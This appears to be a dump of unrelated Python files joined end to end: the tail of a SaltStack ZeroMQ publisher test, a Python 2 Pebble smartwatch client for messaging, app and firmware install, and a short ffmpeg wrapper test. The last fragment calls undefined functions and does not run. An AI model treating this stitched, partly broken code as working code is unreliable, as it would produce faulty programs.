load = {"tgt_type": "glob", "tgt": "*", "jid": i}
server_channel.publish(load)
gather.join()
server_channel.pub_close()
assert len(results) == send_num, (len(results), set(expect).difference(results))
@staticmethod
def _send_small(opts, sid, num=10):
server_channel = salt.transport.zeromq.ZeroMQPubServerChannel(opts)
for i in range(num):
load = {"tgt_type": "glob", "tgt": "*", "jid": "{}-{}".format(sid, i)}
server_channel.publish(load)
server_channel.close()
@staticmethod
def _send_large(opts, sid, num=10, size=250000 * 3):
server_channel = salt.transport.zeromq.ZeroMQPubServerChannel(opts)
for i in range(num):
load = {
"tgt_type": "glob",
"tgt": "*",
"jid": "{}-{}".format(sid, i),
"xdata": "0" * size,
}
server_channel.publish(load)
server_channel.close()
@slowTest
def test_issue_36469_tcp(self):
"""
Test sending both large and small messags to publisher using TCP
https://github.com/saltstack/salt/issues/36469
"""
opts = dict(self.master_config, ipc_mode="tcp", pub_hwm=0)
server_channel = salt.transport.zeromq.ZeroMQPubServerChannel(opts)
server_channel.pre_fork(
self.process_manager,
kwargs={"log_queue": salt.log.setup.get_multiprocessing_logging_queue()},
)
send_num = 10 * 4
expect = []
results = []
pub_uri = "tcp://{interface}:{publish_port}".format(**opts)
# Allow time for server channel to start, especially on windows
time.sleep(2)
gather = threading.Thread(
target=self._gather_results, args=(self.minion_config, pub_uri, results,)
)
gather.start()
with ThreadPoolExecutor(max_workers=4) as executor:
executor.submit(self._send_small, opts, 1)
executor.submit(self._send_small, opts, 2)
executor.submit(self._send_small, opts, 3)
executor.submit(self._send_large, opts, 4)
expect = ["{}-{}".format(a, b) for a in range(10) for b in (1, 2, 3, 4)]
time.sleep(0.1)
server_channel.publish({"tgt_type": "glob", "tgt": "*", "stop": True})
gather.join()
server_channel.pub_close()
assert len(results) == send_num, (len(results), set(expect).difference(results))
|
pebble.py
|
#!/usr/bin/env python
import array
import binascii
import glob
import itertools
import json
import logging
import os
import serial
import signal
import stm32_crc
import struct
import threading
import time
import traceback
import uuid
import zipfile
from collections import OrderedDict
from LightBluePebble import LightBluePebble
from struct import pack, unpack
log = logging.getLogger()
logging.basicConfig(format='[%(levelname)-8s] %(message)s')
log.setLevel(logging.DEBUG)
DEFAULT_PEBBLE_ID = None #Triggers autodetection on unix-like systems
DEBUG_PROTOCOL = True
class PebbleBundle(object):
MANIFEST_FILENAME = 'manifest.json'
STRUCT_DEFINITION = [
'8s', # header
'2B', # struct version
'2B', # sdk version
'2B', # app version
'H', # size
'I', # offset
'I', # crc
'32s', # app name
'32s', # company name
'I', # icon resource id
'I', # symbol table address
'I', # flags
'I', # relocation list start
'I', # num relocation list entries
'16s' # uuid
]
def __init__(self, bundle_path):
bundle_abs_path = os.path.abspath(bundle_path)
if not os.path.exists(bundle_abs_path):
raise Exception("Bundle does not exist: " + bundle_path)
self.zip = zipfile.ZipFile(bundle_abs_path)
self.path = bundle_abs_path
self.manifest = None
self.header = None
self.app_metadata_struct = struct.Struct(''.join(self.STRUCT_DEFINITION))
self.app_metadata_length_bytes = self.app_metadata_struct.size
def get_manifest(self):
if (self.manifest):
return self.manifest
if self.MANIFEST_FILENAME not in self.zip.namelist():
raise Exception("Could not find {}; are you sure this is a PebbleBundle?".format(self.MANIFEST_FILENAME))
self.manifest = json.loads(self.zip.read(self.MANIFEST_FILENAME))
return self.manifest
def get_app_metadata(self):
if (self.header):
return self.header
app_manifest = self.get_manifest()['application']
app_bin = self.zip.open(app_manifest['name']).read()
header = app_bin[0:self.app_metadata_length_bytes]
values = self.app_metadata_struct.unpack(header)
self.header = {
'sentinel' : values[0],
'struct_version_major' : values[1],
'struct_version_minor' : values[2],
'sdk_version_major' : values[3],
'sdk_version_minor' : values[4],
'app_version_major' : values[5],
'app_version_minor' : values[6],
'app_size' : values[7],
'offset' : values[8],
'crc' : values[9],
'app_name' : values[10].rstrip('\0'),
'company_name' : values[11].rstrip('\0'),
'icon_resource_id' : values[12],
'symbol_table_addr' : values[13],
'flags' : values[14],
'relocation_list_index' : values[15],
'num_relocation_entries' : values[16],
'uuid' : uuid.UUID(bytes=values[17])
}
return self.header
def close(self):
self.zip.close()
def is_firmware_bundle(self):
return 'firmware' in self.get_manifest()
def is_app_bundle(self):
return 'application' in self.get_manifest()
def has_resources(self):
return 'resources' in self.get_manifest()
def get_firmware_info(self):
if not self.is_firmware_bundle():
return None
return self.get_manifest()['firmware']
def get_application_info(self):
if not self.is_app_bundle():
return None
return self.get_manifest()['application']
def get_resources_info(self):
if not self.has_resources():
return None
return self.get_manifest()['resources']
class EndpointSync():
timeout = 10
def __init__(self, pebble, endpoint):
pebble.register_endpoint(endpoint, self.callback)
self.marker = threading.Event()
def callback(self, *args):
self.data = args
self.marker.set()
def get_data(self):
try:
self.marker.wait(timeout=self.timeout)
return self.data[1]
except:
return False
class PebbleError(Exception):
def __init__(self, id, message):
self._id = id
self._message = message
def __str__(self):
return "%s (ID:%s)" % (self._message, self._id)
class Pebble(object):
"""
A connection to a Pebble watch; data and commands may be sent
to the watch through an instance of this class.
"""
endpoints = {
"TIME": 11,
"VERSION": 16,
"PHONE_VERSION": 17,
"SYSTEM_MESSAGE": 18,
"MUSIC_CONTROL": 32,
"PHONE_CONTROL": 33,
"APPLICATION_MESSAGE": 48,
"LAUNCHER": 49,
"LOGS": 2000,
"PING": 2001,
"LOG_DUMP": 2002,
"RESET": 2003,
"APP": 2004,
"APP_LOGS": 2006,
"NOTIFICATION": 3000,
"RESOURCE": 4000,
"APP_MANAGER": 6000,
"PUTBYTES": 48879
}
log_levels = {
0: "*",
1: "E",
50: "W",
100: "I",
200: "D",
250: "V"
}
bridges = {}
@staticmethod
def AutodetectDevice():
if os.name != "posix": #i.e. Windows
raise NotImplementedError("Autodetection is only implemented on UNIX-like systems.")
pebbles = glob.glob("/dev/tty.Pebble????-SerialPortSe")
if len(pebbles) == 0:
raise PebbleError(None, "Autodetection could not find any Pebble devices")
elif len(pebbles) > 1:
log.warn("Autodetect found %d Pebbles; using most recent" % len(pebbles))
#NOTE: Not entirely sure if this is the correct approach
pebbles.sort(key=lambda x: os.stat(x).st_mtime, reverse=True)
id = pebbles[0][15:19]
log.info("Autodetect found a Pebble with ID %s" % id)
return id
def __init__(self, id = None, using_lightblue = True, pair_first = False):
if id is None and not using_lightblue:
id = Pebble.AutodetectDevice()
self.id = id
self.using_lightblue = using_lightblue
self._alive = True
self._endpoint_handlers = {}
self._internal_endpoint_handlers = {
self.endpoints["TIME"]: self._get_time_response,
self.endpoints["VERSION"]: self._version_response,
self.endpoints["PHONE_VERSION"]: self._phone_version_response,
self.endpoints["SYSTEM_MESSAGE"]: self._system_message_response,
self.endpoints["MUSIC_CONTROL"]: self._music_control_response,
self.endpoints["APPLICATION_MESSAGE"]: self._application_message_response,
self.endpoints["LAUNCHER"]: self._application_message_response,
self.endpoints["LOGS"]: self._log_response,
self.endpoints["PING"]: self._ping_response,
self.endpoints["APP_LOGS"]: self._app_log_response,
self.endpoints["APP_MANAGER"]: self._appbank_status_response
}
try:
if using_lightblue:
self._ser = LightBluePebble(self.id, pair_first)
signal.signal(signal.SIGINT, self._exit_signal_handler)
else:
devicefile = "/dev/tty.Pebble"+id+"-SerialPortSe"
log.debug("Attempting to open %s as Pebble device %s" % (devicefile, id))
self._ser = serial.Serial(devicefile, 115200, timeout=1)
log.debug("Initializing reader thread")
self._read_thread = threading.Thread(target=self._reader)
self._read_thread.setDaemon(True)
self._read_thread.start()
log.debug("Reader thread loaded on tid %s" % self._read_thread.name)
except PebbleError:
raise PebbleError(id, "Failed to connect to Pebble")
except:
raise
def _exit_signal_handler(self, signum, frame):
print "Disconnecting before exiting..."
self.disconnect()
time.sleep(1)
os._exit(0)
def __del__(self):
try:
self._ser.close()
except:
pass
def _reader(self):
try:
while self._alive:
endpoint, resp = self._recv_message()
if resp == None:
continue
if endpoint in self._internal_endpoint_handlers:
resp = self._internal_endpoint_handlers[endpoint](endpoint, resp)
if endpoint in self._endpoint_handlers and resp:
self._endpoint_handlers[endpoint](endpoint, resp)
except:
traceback.print_exc()
raise PebbleError(self.id, "Lost connection to Pebble")
self._alive = False
def _pack_message_data(self, lead, parts):
pascal = map(lambda x: x[:255], parts)
d = pack("b" + reduce(lambda x,y: str(x) + "p" + str(y), map(lambda x: len(x) + 1, pascal)) + "p", lead, *pascal)
return d
def _build_message(self, endpoint, data):
return pack("!HH", len(data), endpoint)+data
def _send_message(self, endpoint, data, callback = None):
if endpoint not in self.endpoints:
raise PebbleError(self.id, "Invalid endpoint specified")
msg = self._build_message(self.endpoints[endpoint], data)
if DEBUG_PROTOCOL:
log.debug('>>> ' + msg.encode('hex'))
self._ser.write(msg)
def _recv_message(self):
if self.using_lightblue:
try:
endpoint, resp, data = self._ser.read()
if resp is None:
return None, None
except TypeError:
# the lightblue process has likely shutdown and cannot be read from
self.alive = False
return None, None
else:
data = self._ser.read(4)
if len(data) == 0:
return (None, None)
elif len(data) < 4:
raise PebbleError(self.id, "Malformed response with length "+str(len(data)))
size, endpoint = unpack("!HH", data)
resp = self._ser.read(size)
if DEBUG_PROTOCOL:
log.debug("Got message for endpoint %s of length %d" % (endpoint, len(resp)))
log.debug('<<< ' + (data + resp).encode('hex'))
return (endpoint, resp)
def register_endpoint(self, endpoint_name, func):
if endpoint_name not in self.endpoints:
raise PebbleError(self.id, "Invalid endpoint specified")
endpoint = self.endpoints[endpoint_name]
self._endpoint_handlers[endpoint] = func
def notification_sms(self, sender, body):
"""Send a 'SMS Notification' to the displayed on the watch."""
ts = str(int(time.time())*1000)
parts = [sender, body, ts]
self._send_message("NOTIFICATION", self._pack_message_data(1, parts))
def notification_email(self, sender, subject, body):
"""Send an 'Email Notification' to the displayed on the watch."""
ts = str(int(time.time())*1000)
parts = [sender, body, ts, subject]
self._send_message("NOTIFICATION", self._pack_message_data(0, parts))
def set_nowplaying_metadata(self, track, album, artist):
"""Update the song metadata displayed in Pebble's music app."""
parts = [artist[:30], album[:30], track[:30]]
self._send_message("MUSIC_CONTROL", self._pack_message_data(16, parts))
def get_versions(self, async = False):
"""
Retrieve a summary of version information for various software
(firmware, bootloader, etc) running on the watch.
"""
self._send_message("VERSION", "\x00")
if not async:
return EndpointSync(self, "VERSION").get_data()
def get_appbank_status(self, async = False):
"""
Retrieve a list of all installed watch-apps.
This is particularly useful when trying to locate a
free app-bank to use when installing a new watch-app.
"""
self._send_message("APP_MANAGER", "\x01")
if not async:
return EndpointSync(self, "APP_MANAGER").get_data()
def remove_app(self, appid, index, async=False):
"""Remove an installed application from the target app-bank."""
data = pack("!bII", 2, appid, index)
self._send_message("APP_MANAGER", data)
if not async:
return EndpointSync(self, "APP_MANAGER").get_data()
def remove_app_by_uuid(self, uuid_to_remove, uuid_is_string=True, async = False):
"""Remove an installed application by UUID."""
if uuid_is_string:
uuid_to_remove = uuid_to_remove.decode('hex')
elif type(uuid_to_remove) is uuid.UUID:
uuid_to_remove = uuid_to_remove.bytes
# else, assume it's a byte array
data = pack("b", 0x02) + str(uuid_to_remove)
self._send_message("APP_MANAGER", data)
if not async:
return EndpointSync(self, "APP_MANAGER").get_data()
def get_time(self, async = False):
"""Retrieve the time from the Pebble's RTC."""
self._send_message("TIME", "\x00")
if not async:
return EndpointSync(self, "TIME").get_data()
def set_time(self, timestamp):
"""Set the time stored in the target Pebble's RTC."""
data = pack("!bL", 2, timestamp)
self._send_message("TIME", data)
def reinstall_app(self, pbz_path, launch_on_install=True):
"""
A convenience method to uninstall and install an app
If the UUID uninstallation method fails, app name in metadata will be used.
"""
def endpoint_check(result, pbz_path):
if result == 'app removed':
print result
return True
else:
if DEBUG_PROTOCOL:
log.warn("Failed to remove supplied app, app manager message was: " + result)
return False
# get the bundle's metadata to identify the app being replaced
bundle = PebbleBundle(pbz_path)
if not bundle.is_app_bundle():
raise PebbleError(self.id, "This is not an app bundle")
app_metadata = bundle.get_app_metadata()
# attempt to remove an app by its UUID
result_uuid = self.remove_app_by_uuid(app_metadata['uuid'].bytes, uuid_is_string=False)
if endpoint_check(result_uuid, pbz_path):
return self.install_app(pbz_path, launch_on_install)
if DEBUG_PROTOCOL:
log.warn("UUID removal failure, attempting to remove existing app by app name")
# attempt to remove an app by its name
apps = self.get_appbank_status()
for app in apps["apps"]:
if app["name"] == app_metadata['app_name']:
result_name = self.remove_app(app["id"], app["index"])
if endpoint_check(result_name, pbz_path):
return self.install_app(pbz_path, launch_on_install)
log.warn("Unable to locate previous instance of supplied application")
def reinstall_app_by_uuid(self, uuid, pbz_path):
"""
A convenience method to uninstall and install an app by UUID.
Must supply app UUID from source. ex: '54D3008F0E46462C995C0D0B4E01148C'
"""
self.remove_app_by_uuid(uuid)
self.install_app(pbz_path)
def install_app(self, pbz_path, launch_on_install=True):
"""
Install an app bundle (*.pbw) to the target Pebble.
This will pick the first free app-bank available.
"""
bundle = PebbleBundle(pbz_path)
if not bundle.is_app_bundle():
raise PebbleError(self.id, "This is not an app bundle")
app_metadata = bundle.get_app_metadata()
binary = bundle.zip.read(bundle.get_application_info()['name'])
if bundle.has_resources():
resources = bundle.zip.read(bundle.get_resources_info()['name'])
else:
resources = None
apps = self.get_appbank_status()
if not apps:
raise PebbleError(self.id, "could not obtain app list; try again")
first_free = 1
for app in apps["apps"]:
if app["index"] == first_free:
first_free += 1
if first_free == apps["banks"]:
raise PebbleError(self.id, "All %d app banks are full" % apps["banks"])
log.debug("Attempting to add app to bank %d of %d" % (first_free, apps["banks"]))
client = PutBytesClient(self, first_free, "BINARY", binary)
self.register_endpoint("PUTBYTES", client.handle_message)
client.init()
while not client._done and not client._error:
pass
if client._error:
raise PebbleError(self.id, "Failed to send application binary %s/pebble-app.bin" % pbz_path)
if resources:
client = PutBytesClient(self, first_free, "RESOURCES", resources)
self.register_endpoint("PUTBYTES", client.handle_message)
client.init()
while not client._done and not client._error:
pass
if client._error:
raise PebbleError(self.id, "Failed to send application resources %s/app_resources.pbpack" % pbz_path)
time.sleep(2)
self._add_app(first_free)
time.sleep(2)
if launch_on_install:
self.launcher_message(app_metadata['uuid'].bytes, "RUNNING", uuid_is_string=False)
def install_firmware(self, pbz_path, recovery=False):
"""Install a firmware bundle to the target watch."""
resources = None
with zipfile.ZipFile(pbz_path) as pbz:
binary = pbz.read("tintin_fw.bin")
if not recovery:
resources = pbz.read("system_resources.pbpack")
self.system_message("FIRMWARE_START")
time.sleep(2)
if resources:
client = PutBytesClient(self, 0, "SYS_RESOURCES", resources)
self.register_endpoint("PUTBYTES", client.handle_message)
client.init()
while not client._done and not client._error:
pass
if client._error:
raise PebbleError(self.id, "Failed to send firmware resources %s/system_resources.pbpack" % pbz_path)
client = PutBytesClient(self, 0, "RECOVERY" if recovery else "FIRMWARE", binary)
self.register_endpoint("PUTBYTES", client.handle_message)
client.init()
while not client._done and not client._error:
pass
if client._error:
raise PebbleError(self.id, "Failed to send firmware binary %s/tintin_fw.bin" % pbz_path)
self.system_message("FIRMWARE_COMPLETE")
def launcher_message(self, app_uuid, key_value, uuid_is_string = True, async = False):
""" send an appication message to launch or kill a specified application"""
launcher_keys = {
"RUN_STATE_KEY": 1,
}
launcher_key_values = {
"NOT_RUNNING": b'\x00',
"RUNNING": b'\x01'
}
if key_value not in launcher_key_values:
raise PebbleError(self.id, "not a valid application message")
if uuid_is_string:
app_uuid = app_uuid.decode('hex')
elif type(app_uuid) is uuid.UUID:
app_uuid = app_uuid.bytes
#else we can assume it's a byte array
# build and send a single tuple-sized launcher command
app_message_tuple = AppMessage.build_tuple(launcher_keys["RUN_STATE_KEY"], "UINT", launcher_key_values[key_value])
app_message_dict = AppMessage.build_dict(app_message_tuple)
packed_message = AppMessage.build_message(app_message_dict, "PUSH", app_uuid)
self._send_message("LAUNCHER", packed_message)
# wait for either ACK or NACK response
if not async:
return EndpointSync(self, "LAUNCHER").get_data()
def app_message_send_tuple(self, app_uuid, key, tuple_datatype, tuple_data):
""" Send a Dictionary with a single tuple to the app corresponding to UUID """
app_uuid = app_uuid.decode('hex')
app_message_tuple = AppMessage.build_tuple(key, tuple_datatype, tuple_data)
app_message_dict = AppMessage.build_dict(app_message_tuple)
packed_message = AppMessage.build_message(app_message_dict, "PUSH", app_uuid)
self._send_message("APPLICATION_MESSAGE", packed_message)
def app_message_send_string(self, app_uuid, key, string):
""" Send a Dictionary with a single tuple of type CSTRING to the app corresponding to UUID """
# NULL terminate and pack
string = string + '\0'
fmt = '<' + str(len(string)) + 's'
string = pack(fmt, string);
self.app_message_send_tuple(app_uuid, key, "CSTRING", string)
def app_message_send_uint(self, app_uuid, key, tuple_uint):
""" Send a Dictionary with a single tuple of type UINT to the app corresponding to UUID """
fmt = '<' + str(tuple_uint.bit_length() / 8 + 1) + 'B'
tuple_uint = pack(fmt, tuple_uint)
self.app_message_send_tuple(app_uuid, key, "UINT", tuple_uint)
def app_message_send_int(self, app_uuid, key, tuple_int):
""" Send a Dictionary with a single tuple of type INT to the app corresponding to UUID """
fmt = '<' + str(tuple_int.bit_length() / 8 + 1) + 'b'
tuple_int = pack(fmt, tuple_int)
self.app_message_send_tuple(app_uuid, key, "INT", tuple_int)
def app_message_send_byte_array(self, app_uuid, key, tuple_byte_array):
""" Send a Dictionary with a single tuple of type BYTE_ARRAY to the app corresponding to UUID """
# Already packed, fix endianness
tuple_byte_array = tuple_byte_array[::-1]
self.app_message_send_tuple(app_uuid, key, "BYTE_ARRAY", tuple_byte_array)
def system_message(self, command):
"""
Send a 'system message' to the watch.
These messages are used to signal important events/state-changes to the watch firmware.
"""
commands = {
"FIRMWARE_AVAILABLE": 0,
"FIRMWARE_START": 1,
"FIRMWARE_COMPLETE": 2,
"FIRMWARE_FAIL": 3,
"FIRMWARE_UP_TO_DATE": 4,
"FIRMWARE_OUT_OF_DATE": 5,
"BLUETOOTH_START_DISCOVERABLE": 6,
"BLUETOOTH_END_DISCOVERABLE": 7
}
if command not in commands:
raise PebbleError(self.id, "Invalid command \"%s\"" % command)
data = pack("!bb", 0, commands[command])
log.debug("Sending command %s (code %d)" % (command, commands[command]))
self._send_message("SYSTEM_MESSAGE", data)
def ping(self, cookie = 0xDEC0DE, async = False):
"""Send a 'ping' to the watch to test connectivity."""
data = pack("!bL", 0, cookie)
self._send_message("PING", data)
if not async:
return EndpointSync(self, "PING").get_data()
def reset(self):
"""Reset the watch remotely."""
self._send_message("RESET", "\x00")
def disconnect(self):
"""Disconnect from the target Pebble."""
self._alive = False
self._ser.close()
def _add_app(self, index):
data = pack("!bI", 3, index)
self._send_message("APP_MANAGER", data)
def _ping_response(self, endpoint, data):
restype, retcookie = unpack("!bL", data)
return retcookie
def _get_time_response(self, endpoint, data):
restype, timestamp = unpack("!bL", data)
return timestamp
def _system_message_response(self, endpoint, data):
if len(data) == 2:
log.info("Got system message %s" % repr(unpack('!bb', data)))
else:
log.info("Got 'unknown' system message...")
def _log_response(self, endpoint, data):
if (len(data) < 8):
log.warn("Unable to decode log message (length %d is less than 8)" % len(data))
return
timestamp, level, msgsize, linenumber = unpack("!IBBH", data[:8])
filename = data[8:24].decode('utf-8')
message = data[24:24+msgsize].decode('utf-8')
str_level = self.log_levels[level] if level in self.log_levels else "?"
print timestamp, str_level, filename, linenumber, message
def _app_log_response(self, endpoint, data):
if (len(data) < 8):
log.warn("Unable to decode log message (length %d is less than 8)" % len(data))
return
app_uuid = uuid.UUID(bytes=data[0:16])
timestamp, level, msgsize, linenumber = unpack("!IBBH", data[16:24])
filename = data[24:40].decode('utf-8')
message = data[40:40+msgsize].decode('utf-8')
str_level = self.log_levels[level] if level in self.log_levels else "?"
print timestamp, str_level, app_uuid, filename, linenumber, message
def _appbank_status_response(self, endpoint, data):
apps = {}
restype, = unpack("!b", data[0])
app_install_message = {
0: "app available",
1: "app removed",
2: "app updated"
}
if restype == 1:
apps["banks"], apps_installed = unpack("!II", data[1:9])
apps["apps"] = []
appinfo_size = 78
offset = 9
for i in xrange(apps_installed):
app = {}
try:
app["id"], app["index"], app["name"], app["company"], app["flags"], app["version"] = \
unpack("!II32s32sIH", data[offset:offset+appinfo_size])
app["name"] = app["name"].replace("\x00", "")
app["company"] = app["company"].replace("\x00", "")
apps["apps"] += [app]
except:
if offset+appinfo_size > len(data):
log.warn("Couldn't load bank %d; remaining data = %s" % (i,repr(data[offset:])))
else:
raise
offset += appinfo_size
return apps
elif restype == 2:
message_id = unpack("!I", data[1:])
message_id = int(''.join(map(str, message_id)))
return app_install_message[message_id]
def _version_response(self, endpoint, data):
fw_names = {
0: "normal_fw",
1: "recovery_fw"
}
resp = {}
for i in xrange(2):
fwver_size = 47
offset = i*fwver_size+1
fw = {}
fw["timestamp"],fw["version"],fw["commit"],fw["is_recovery"], \
fw["hardware_platform"],fw["metadata_ver"] = \
unpack("!i32s8s?bb", data[offset:offset+fwver_size])
fw["version"] = fw["version"].replace("\x00", "")
fw["commit"] = fw["commit"].replace("\x00", "")
fw_name = fw_names[i]
resp[fw_name] = fw
resp["bootloader_timestamp"],resp["hw_version"],resp["serial"] = \
unpack("!L9s12s", data[95:120])
resp["hw_version"] = resp["hw_version"].replace("\x00","")
btmac_hex = binascii.hexlify(data[120:126])
resp["btmac"] = ":".join([btmac_hex[i:i+2].upper() for i in reversed(xrange(0, 12, 2))])
return resp
def install_bridge(self, bridge):
assert "process" in dir(bridge) #TODO: Proper parentage check
self.bridges[bridge.UUID] = bridge(self)
log.info("Installed %s as a bridge on UUID %s" % (bridge, bridge.UUID))
def _application_message_response(self, endpoint, data):
command = data[0]
if command == b'\x01': #PUSH
(command, transaction, app_uuid, msg_dict) = AppMessage.read_message(data)
log.debug("ACKing transaction %x" % ord(transaction))
self._send_message("APPLICATION_MESSAGE", "\xFF%s" % transaction)
if app_uuid in self.bridges:
reply = self.bridges[app_uuid].process(msg_dict)
if reply is not None:
msg = AppMessage.construct_message(reply, "PUSH", app_uuid.bytes, transaction)
self._send_message("APPLICATION_MESSAGE", msg)
else:
log.warn("Got app message for %s and no bridge was found" % app_uuid)
elif command == b'\x02': #REQUEST:
log.warn("Got app request; not yet implemented; NACKing")
transaction = data[1]
self._send_message("APPLICATION_MESSAGE", "\x7F%s" % transaction)
elif command == b'\x7F': #NACK
transaction = data[1]
log.warn("Pebble NACKed transaction %x" % ord(transaction))
elif command == b'\xFF': #ACK
transaction = data[1]
log.debug("Pebble ACKed transaction %x" % ord(transaction))
else:
log.error("Unknown command type %x" % ord(command))
#TODO: Old, untouched, code. Remove?
if len(data) > 1:
rest = data[1:]
else:
rest = ''
if data[0] in AppMessage.app_messages:
return AppMessage.app_messages[data[0]] + rest
def _phone_version_response(self, endpoint, data):
session_cap = {
"GAMMA_RAY" : 0x80000000,
}
remote_cap = {
"TELEPHONY" : 16,
"SMS" : 32,
"GPS" : 64,
"BTLE" : 128,
"CAMERA_REAR" : 256,
"ACCEL" : 512,
"GYRO" : 1024,
"COMPASS" : 2048,
}
os = {
"UNKNOWN" : 0,
"IOS" : 1,
"ANDROID" : 2,
"OSX" : 3,
"LINUX" : 4,
"WINDOWS" : 5,
}
# Then session capabilities, android adds GAMMA_RAY and it's
# the only session flag so far
session = session_cap["GAMMA_RAY"]
# Then phone capabilities, android app adds TELEPHONY and SMS,
# and the phone type (we know android works for now)
remote = remote_cap["TELEPHONY"] | remote_cap["SMS"] | os["ANDROID"]
msg = pack("!biII", 1, -1, session, remote)
self._send_message("PHONE_VERSION", msg);
def _music_control_response(self, endpoint, data):
event, = unpack("!b", data)
event_names = {
1: "PLAYPAUSE",
4: "NEXT",
5: "PREVIOUS",
}
return event_names[event] if event in event_names else None
class AppMessage(object):
# tools to build a valid app message
#TODO: Refactor this in to a clean object representation instead of static utility functions.
tuple_datatypes = {
"BYTE_ARRAY": b'\x00',
"CSTRING": b'\x01',
"UINT": b'\x02',
"INT": b'\x03'
}
struct_to_tuple_type = {
'P':'BYTE_ARRAY',
's':'CSTRING',
'b':'INT',
'h':'INT',
'i':'INT',
'q':'INT',
'B':'UINT',
'H':'UINT',
'I':'UINT',
'Q':'UINT',
}
app_messages = {
"PUSH": b'\x01',
"REQUEST": b'\x02',
"ACK": b'\xFF',
"NACK": b'\x7F'
}
def read_byte_array(v_type, v_len, data):
return (array.array('B',data), "%sP" % v_len)
def read_cstring(v_type, v_len, data):
#TODO: This seems kludgy.
n = data.find("\x00")
if n != -1:
data = data[:n]
return (data, "%ss" % v_len)
def read_uint(v_type, v_len, data):
types = {
1:"B",
2:"H",
4:"I",
8:"Q"
}
return (unpack("<%s" % types[v_len], data)[0], types[v_len])
def read_int(v_type, v_len, data):
types = {
1:"b",
2:"h",
4:"i",
8:"q"
}
return (unpack("<%s" % types[v_len], data)[0], types[v_len])
tuple_readers = {
0:read_byte_array,
1:read_cstring,
2:read_uint,
3:read_int
}
@staticmethod
def read_dict(data):
count = ord(data[0])
data = data[1:]
tuples = []
while len(data):
(k,t,l) = unpack("<LBH", data[0:7])
v = data[7:7+l]
p = AppMessage.tuple_readers[t](t,l,v)
tuples.append((k,p))
data = data[7+l:]
return OrderedDict(tuples)
@staticmethod
def read_message(data):
return (data[0], data[1], uuid.UUID(bytes=data[2:18]), AppMessage.read_dict(data[18:]))
#NOTE: The "construct" methods should replace the "build" methods at some point.
@staticmethod
def construct_tuple(key, data_type, data):
t = array.array('B')
t.fromstring(pack('<L', key))
t.fromstring(AppMessage.tuple_datatypes[data_type])
t.fromstring(pack("<H", len(data)))
t.fromstring(data)
return t
@staticmethod
def construct_dict(tuples):
count = len(tuples)
out = array.array('B')
out.fromstring(pack('<B', count))
#TODO: Re-solve this using byte arrays
for v in tuples:
out.extend(v)
return out
@staticmethod
def construct_message(packed_dict, command, uuid, transaction_id):
m = array.array('B')
m.fromstring(AppMessage.app_messages[command])
m.fromstring(transaction_id)
m.fromstring(uuid)
m.extend(packed_dict)
return m.tostring()
@staticmethod
def build_tuple(key, data_type, data):
""" make a single app_message tuple"""
# available app message datatypes:
# build the message_tuple
app_message_tuple = OrderedDict([
("KEY", pack('<L', key)),
("TYPE", AppMessage.tuple_datatypes[data_type]),
("LENGTH", pack('<H', len(data))),
("DATA", data)
])
return app_message_tuple
@staticmethod
def build_dict(tuple_of_tuples):
""" make a dictionary from a list of app_message tuples"""
# note that "TUPLE" can refer to 0 or more tuples. Tuples must be correct endian-ness already
tuple_count = len(tuple_of_tuples)
# make the bytearray from the flattened tuples
tuple_total_bytes = ''.join(item for item in itertools.chain(*tuple_of_tuples.values()))
# now build the dict
app_message_dict = OrderedDict([
("TUPLECOUNT", pack('B', tuple_count)),
("TUPLE", tuple_total_bytes)
])
return app_message_dict
@staticmethod
def build_message(dict_of_tuples, command, uuid, transaction_id=b'\x00'):
""" build the app_message intended for app with matching uuid"""
# NOTE: uuid must be a byte array
# finally build the entire message
app_message = OrderedDict([
("COMMAND", AppMessage.app_messages[command]),
("TRANSACTIONID", transaction_id),
("UUID", uuid),
("DICT", ''.join(dict_of_tuples.values()))
])
return ''.join(app_message.values())
class PutBytesClient(object):
states = {
"NOT_STARTED": 0,
"WAIT_FOR_TOKEN": 1,
"IN_PROGRESS": 2,
"COMMIT": 3,
"COMPLETE": 4,
"FAILED": 5
}
transfer_types = {
"FIRMWARE": 1,
"RECOVERY": 2,
"SYS_RESOURCES": 3,
"RESOURCES": 4,
"BINARY": 5
}
def __init__(self, pebble, index, transfer_type, buffer):
self._pebble = pebble
self._state = self.states["NOT_STARTED"]
self._transfer_type = self.transfer_types[transfer_type]
self._buffer = buffer
self._index = index
self._done = False
self._error = False
def init(self):
data = pack("!bIbb", 1, len(self._buffer), self._transfer_type, self._index)
self._pebble._send_message("PUTBYTES", data)
self._state = self.states["WAIT_FOR_TOKEN"]
def wait_for_token(self, resp):
res, = unpack("!b", resp[0])
if res != 1:
log.error("init failed with code %d" % res)
self._error = True
return
self._token, = unpack("!I", resp[1:])
self._left = len(self._buffer)
self._state = self.states["IN_PROGRESS"]
self.send()
def in_progress(self, resp):
res, = unpack("!b", resp[0])
if res != 1:
self.abort()
return
if self._left > 0:
self.send()
log.debug("Sent %d of %d bytes" % (len(self._buffer)-self._left, len(self._buffer)))
else:
self._state = self.states["COMMIT"]
self.commit()
def commit(self):
data = pack("!bII", 3, self._token & 0xFFFFFFFF, stm32_crc.crc32(self._buffer))
self._pebble._send_message("PUTBYTES", data)
def handle_commit(self, resp):
res, = unpack("!b", resp[0])
if res != 1:
self.abort()
return
self._state = self.states["COMPLETE"]
self.complete()
def complete(self):
data = pack("!bI", 5, self._token & 0xFFFFFFFF)
self._pebble._send_message("PUTBYTES", data)
def handle_complete(self, resp):
res, = unpack("!b", resp[0])
if res != 1:
self.abort()
return
self._done = True
def abort(self):
msgdata = pack("!bI", 4, self._token & 0xFFFFFFFF)
self._pebble.send_message("PUTBYTES", msgdata)
self._error = True
def send(self):
datalen = min(self._left, 2000)
rg = len(self._buffer)-self._left
msgdata = pack("!bII", 2, self._token & 0xFFFFFFFF, datalen)
msgdata += self._buffer[rg:rg+datalen]
self._pebble._send_message("PUTBYTES", msgdata)
self._left -= datalen
def handle_message(self, endpoint, resp):
if self._state == self.states["WAIT_FOR_TOKEN"]:
self.wait_for_token(resp)
elif self._state == self.states["IN_PROGRESS"]:
self.in_progress(resp)
elif self._state == self.states["COMMIT"]:
self.handle_commit(resp)
elif self._state == self.states["COMPLETE"]:
self.handle_complete(resp)
|
test_main.py
|
import shutil
import subprocess
import threading
import sys
CMD = 'ffmpeg -y -i {input} -b:v {bit_rate}M -r {fps} -s hd{res} {output}'
def check_ffmpeg():
FFMPEG = shutil.which('ffmpeg')
if not FFMPEG:
raise FileNotFoundError('FFMPEG not found')
def test_func():
main("video.mp4")
def ffmpeg(name, res):
output_name = str(res)+"output.mp4"
cmd = reformat(name, res, output_name)
subprocess.run(cmd)
